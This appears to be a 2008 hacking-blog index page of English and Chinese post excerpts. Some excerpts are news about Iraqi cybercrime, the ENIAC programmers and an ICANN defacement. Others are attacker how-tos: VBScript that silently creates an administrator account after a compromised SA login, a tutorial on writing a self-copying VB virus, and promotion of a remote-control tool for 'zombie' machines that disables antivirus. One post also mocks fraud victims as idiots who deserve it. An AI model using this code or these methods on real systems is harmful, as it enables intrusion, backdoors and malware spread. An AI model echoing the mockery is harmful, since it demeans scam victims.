Posted by Hacker on 09月 2, 2008
Maj. Ahmed Khathem, the head of Iraq’s newly formed cybercrimes division, sits in a borrowed office, at a borrowed desk, working on a laptop borrowed from one of his subordinates.
iraq hackers.
It is his unit’s lone computer, highlighting the country’s vulnerability to a community of Iraqi hackers defacing websites and attempting to hack into sensitive internal networks.
Iraq’s government is engaged in a bloody struggle against al-Qaeda, and its computers make a prime target for global terror networks that have added hacking to their arsenal.
“We could have the most powerful anti-hacking force in the world, but we’d still have no computers, so we couldn’t do anything,” says Ali Hussein, one of 12 computer science graduates added to the cybercrime team last month. “The government thinks about guns, tanks and raiding houses. Hackers just aren’t a priority.” Computer usage in Iraq has mushroomed since the U.S. invasion in 2003. During the Saddam Hussein era, Internet access was largely forbidden in the country, and economic sanctions made computers difficult to obtain. The Interior Ministry, which had no computers connected to the Internet in 2003, has 5,000 today. Read more »
Posted by Hacker on 08月 31, 2008
右图是纪录片制片人(左)和4名“奶奶级”电脑高手在一起,她们分别是贝蒂(左二)、马琳(左三)、凯瑟琳(右一),前排坐着的贝蒂·辛德·霍伯顿目前也已去世。
她们60年前开始玩电脑,曾为世界上第一台计算机编程序,也是世界上第一批“黑客”,曾为世界第一台电子计算机ENIAC编写过程序
据美国媒体5日报道,在电脑时代,许多老年人不甘落后,然而鲜为人知的是,在美国仍然生活着几名80多岁的“奶奶级”电脑高手:她们曾在二战中 帮助军方精确地计算出炮弹发射轨迹,曾为世界上第一台电子计算机编写程序,还是世界上第一批“黑客”。半个多世纪来,人们对这批“奶奶级”电脑高手毫无所 知,直到日前,她们的故事才首次浮出水面,并正在被拍成一部名叫《隐形电脑:ENIAC程序师的故事》的纪录片。
孙子炫耀牵出传奇故事
现年83岁的美国新泽西州老太太贝蒂·巴蒂克是5个孙子的祖母,喜欢上网打桥牌。然而鲜为人知的是,她其实是世界上最早的一批女性电脑高手,她曾为世界上第一台计算机编过程序。 Read more »
Posted by Hacker on 08月 31, 2008
Hackers can force your browser to send requests to any site they want. It’s not even hard - all they have to do is get you to view an email or a web page.
Unless the site is specifically protected against this - and almost none are - then attackers can make your browser do anything you can do, and they can use your credentials and your access privileges. They can do things like set preferences, create payees and change passwords.
Generally, browsers stop cross-site communication by following the “same-origin policy”. This rule is pretty simple: if your site has a different origin - protocol, domain, and port don’t all match - you aren’t allowed to access information from or send requests to the other site. Without this simple rule, there would be no security on the internet. Every website could access data from every other one - you’d need a separate web browser for every website. Read more »
Posted by Hacker on 08月 21, 2008
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。
来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏。
获取IP
“IP”作为Net用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因不同的网络情况采取不同的方法,如:在局域网内使用 Ping指令,Ping对方在网络中的名称而获得IP;在Internet上使用IP版的QQ直接显示。而最“牛”,也是最有效的办法是截获并分析对方的 网络数据包。用Windows 2003的网络监视器捕获的网络数据包,可能一般的用户比较难看懂这些16进制的代码,而对于了解网络知识的黑客,他们可以找到并直接通过软件解析截获后 的数据包的IP包头信息,再根据这些信息了解具体的IP。 Read more »
Posted by Hacker on 07月 11, 2008
作者: 王岗 出处:51CTO.com
在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","test") '建立用户
od.SetPassword "1234" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用户
oe.add os&"/test"
|
将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下: Read more »
Posted by Hacker on 06月 28, 2008
现在网络诈骗的形式越来越多,日前义乌出现一骗子使用黑客程序破解用户密码,然后冒名顶替向事主的QQ好友借钱,“朋友在QQ里发来短信要4000元急用,看看视频里的确是本人,于是我就寄钱了”,钟女士没想到这却是一个网络新骗局。
我们来解析下黑客是如何实施诈骗的。
首先黑客通过各种渠道(比如入侵网站后挂木马、提供带病毒的文件下载等等)盗取了用户的QQ密码,狡猾的黑客这个时候是不会修改你的QQ密码的,接下来会用另外一个QQ号码,一般是冒充天真无知的女孩来加你,然后借机跟你视频,当你看到对面是个漂亮的女人的时候可千万别美,你已经被人算计了。其实跟你视频的根本就不是女人,而你的照片早已被黑客录制下来,有可能你看到的女人也是黑客早已录制的。接下来黑客会修改掉你的QQ密码,然后就是冒充你在你的QQ好友里寻找诈骗的目标。前面提到的钟女士就是一个很好的例子。
其实黑客的伎俩并不高,只是中国的网民,90%的是白痴(我实话实说),除了玩玩游戏、逗下女孩我想他们没什么在行的。对于这样的人我并不会因为他们被骗而感到遗憾,不客气的说你早该被骗了。这个世界上从来没有强者同情弱者这回事。花钱买教训吧!
Posted by Hacker on 06月 28, 2008
相信电脑界的每个人都痛恨计算机病毒,她给我们带来了很多麻烦和损失,可你知道编写病毒的方法和过程吗?在此我仅以VB编写为例,揭开她的面纱。
用VB编写病毒需要考虑到如下几点:
* 感染主机
首先染毒文件运行后先要判断主机是否以感染病毒,也就是判断病毒主体文件是否存在,如果不存在则将病毒主体拷贝到指定位置(如:将病毒文件拷贝到c:\windows\system\),可用filecopy语句实现;如果病毒已感染主机则结束判断。
例如,判断C:\windows\system\Killer.exe是否存在,如果有则退出判断,如果没有则证明本机未感染病毒,立即拷入病毒文件。
病毒源文件名为game.exe
声明部分:
“”定义 FileExists% 函数
public success%
Function FileExists%(fname$)
On Local Error Resume Next
Dim ff%
ff% = FreeFile
Open fname$ For Input As ff%
If Err Then
FileExists% = False
Else
FileExists% = True
End If
Close ff%
End Function Read more »
Posted by Hacker on 06月 27, 2008
Windows Vista通过产品序列号——或称密钥、ProdUCt Key、CD Key以及日后可能出现的针对大客户的Volume License Key (VLK)等——来判断自身是否为正版,只有正确的序列号才能激活Windows Vista,不然,Windows Vista便只能使用在精减模式下。
在某些情况下,当我们安装Windows Vista时,可能会因操作失误或别的原因而输入错误的序列号,导致无法通过Windows 正版验证,无法激活。那么,此时我们是不是用正确的序列号需要重新安装Windows Vista呢?
答案是否定的,我们可以在安装Windows Vista后在系统中更改使用的产品序列号,不会影响系统的正常使用。
在图形界面中更改Windows Vista序列号
这是最常用也最方便的方式。我们可以在Windows Vista的系统属性页中更改产品序列号。
要打开系统属性页,可通过如下方式:
在桌面的“计算机”图标上单击右键,选择“属性”; 依次点击“开始” →“控制面板”→“系统”(控制面板使用经典视图时); 依次点击“开始”→“控制面板”→“系统和维护”→“系统”(控制面板使用分类视图时);
在系统属性页的底部的“Windows 激活”项中可以看到以小盾牌标注的UAC功能项“更改产品密钥(K)”,单击它然后输入正确的序列号(25位数字)即可。
注:对于已经进入精减模式的Windows Vista,比如说超过测试期限的Windows Vista RTM,此处出现的功能项则为“重新输入产品密钥”,其实现功能与“更改产品密钥”相同。
使用命令行更改Windows Vista序列号
对高级用户而言,可能更愿意使用命令行来更改Windows Vista序列号——这样才可显示出技术水平嘛!
首先,以管理员身份打开命令行窗口。
在命令行窗口中输入:
slmgr.vbs -ipk 待输入的序列号
其中,slmgr.vbs将启动Windows授权管理工具,“-ipk”选项即为替换当前密钥; 使用已输入的产品序列号激活Windows Vista,可使用如下命令:
slmgr.vbs –ato
这样,Windows Vista中原有的序列号便已被新的序列号替换。
Posted by Hacker on 06月 27, 2008
负责监督网站域名的非盈利性组织“互联网域名与地址管理机构”(ICANN)被一群土耳其黑客攻破。
这实在是很讽刺的一件事情。一直提供网络域名安全指引的ICANN这回自身难保,同时被攻克的还有互联网地址指派机构(IANA)。这群土耳其黑客成功篡改了ICANN的主页,其留言大意为: 你们以为你们控制着所有的域名么?不对,包括你们的域名,都在我们的掌控之中。不相信?哇哈哈哈哈…
黑客还把ICANN的访问者重定向到Atspace.com这个域名下,而这个域名指向的ip是photobucket的,看来也被黑了。这群黑客也太牛了…
Posted by Hacker on 06月 25, 2008
简便快捷好方法 请看注册表应用点点通
1.快速删除键值
通常情况下我们要删除注册表中的某个键或者键值,都是打开“注册表编辑器”,然后定位到相关分支进行删除操作。但如果我们要对多台计算机做 同样的操作呢?或者这种删除操作是需要常常进行的呢?这就不方便了。其实可以通过将删除操作做成*.reg文件的形式,双击该*.reg文件即可完成删除操作。
删除某个注册表分支:打开“注册表编辑器”,将要删除的分支导出为*.reg文件,用“记事本”打开该文件,将形如 “[HKEY_LOCAL_MACHINE\SOFTWARE\……]”的字段修改为“[-HKEY_LOCAL_MACHINE\SOFTWARE \……]”即可。
删除某个注册表键:同样将该键导出为*.reg文件,用“记事本”打开该文件,将要删除键的键值修改为“-”即可,如要删除某名为“cfan”的键,则修改为形如:”cfan”=-。
2.修复文件的注册表关联
中了木马之后其实最麻烦的并不是查杀,而是查杀之后的系统设置恢复过程,由于木马普遍都对注册表比较感兴趣,而在查杀之后杀毒软件又不会自动修复注册表,所以经常出现杀毒后反而无法正常使用的情况。文件的注册表关联就是最典型的例子,如何快速修复它呢?
(1)由于无法运行文件,而又需要通过Regedit.来修改注册表,所以先要把C:\Windows目录下的Regedit.文件重命名为Regedit.com,运行Regedit.com启动“注册表编辑器”。
(2)定位到[HKEY_CLASSES_ROOT\.],将右侧窗口中“默认”的键值改为“file”。
(3)依次展开[HKEY_CLASSES_ROOT\file\shell\open\command]分支,然后将右侧窗口中的“默认”的键值改为“”%1″ %*”(不要外侧引号)。 Read more »
Posted by Hacker on 05月 29, 2008
对于企业而言,服务器的重要性是不言而喻的。因此管理员们往往以维持服务器的稳定、高效地运行作为自己的工作目标,但是对于服务器的安全性往往考虑得较少,至少对于某些管理员是这样的。
最近笔者进行了一例服务器的安全测试,下面把这例测试过程写下来,希望对大家有所启示。
测试工具:
1.S扫描器(一种速度极快的多线程命令行下的扫描工具)
2.SQL登陆器
3.DNS溢出工具
4.cmd(微软命令行工具)
4.scansql.exe(SQL弱口令扫描工具)
SQL Server弱口令测试 Read more »
Posted by Hacker on 04月 24, 2008
听说过灰鸽子、冰河等可以实现 远程控制,但你听说过IE也可以实现吗?不错,一款基于IE的新鲜工具——rmtSvc&vIDC即可让微软的IE成为一个超级黑客帮凶。本文除 了将为你展现rmtSvc&vIDC是如何基于IE远程控制肉鸡以外,更在如何“暗杀”杀毒软件、攻击思路上有较强的指导性。
如果我问你IE能做什么?你的答案绝对不完整!IE可不仅仅能浏览网页。如果我再告诉你IE还能用来远程控制、远程传输、进程管理、代理服务,甚至远程开启Telnet、FTP服务等等呢?你一定觉得不可思议吧,有了rmtSvc&vIDC,这一切皆有可能!
Read more »
Posted by Hacker on 04月 16, 2008
随着网络与信息技术的飞速发展,尤其是在互连网飞速发展的今天,网络已经逐渐改变了人们的生活方式 ,成了生活中不可缺少的一部分。越来越多的企业已经开始建设自己的业务信息系统, 所以网络安全的重要性就此体现出来了。笔者在在中国被黑站点统计系统调查发现2007年 全国共有24516个一级域名网站被篡改,这仅仅还是以知的不包括所有的二级或二级域名以下的网站数据,其中包括: Read more »
Posted by Hacker on 04月 12, 2008
Windows Vista系统管理员如果忘记登录密码,难道只能重装吗?当然不是,下面介绍两种破解方法希望对大家有所帮助。
请先将Vista安装盘放入光驱,重新启动计算机,在CMOS中进行设置以光驱启动。
1.当出现安装界面时,请单击“Repair your computer”(修复系统),在随后弹出的对话框中选择“Command Prompt”(命令提示符)。
2.在调用了系统的命令提示符窗口后,请输入“mmc.exe”命令并按回车键,系统将会调用出控制台。 Read more »
Posted by Hacker on 04月 12, 2008
QQ2008 Beta1,被网友爆出漏洞——即在查看Q友资料的时候会完整显示网友的手机号码。
之前的QQ在查看网友资料的时候,手机号码后面几位是以星号代替的。
据悉,此漏洞已经报给腾讯公司,腾讯公司标识将尽快处理。感兴趣的朋友自己测试下,看腾讯现在补上这个漏洞没有哦!
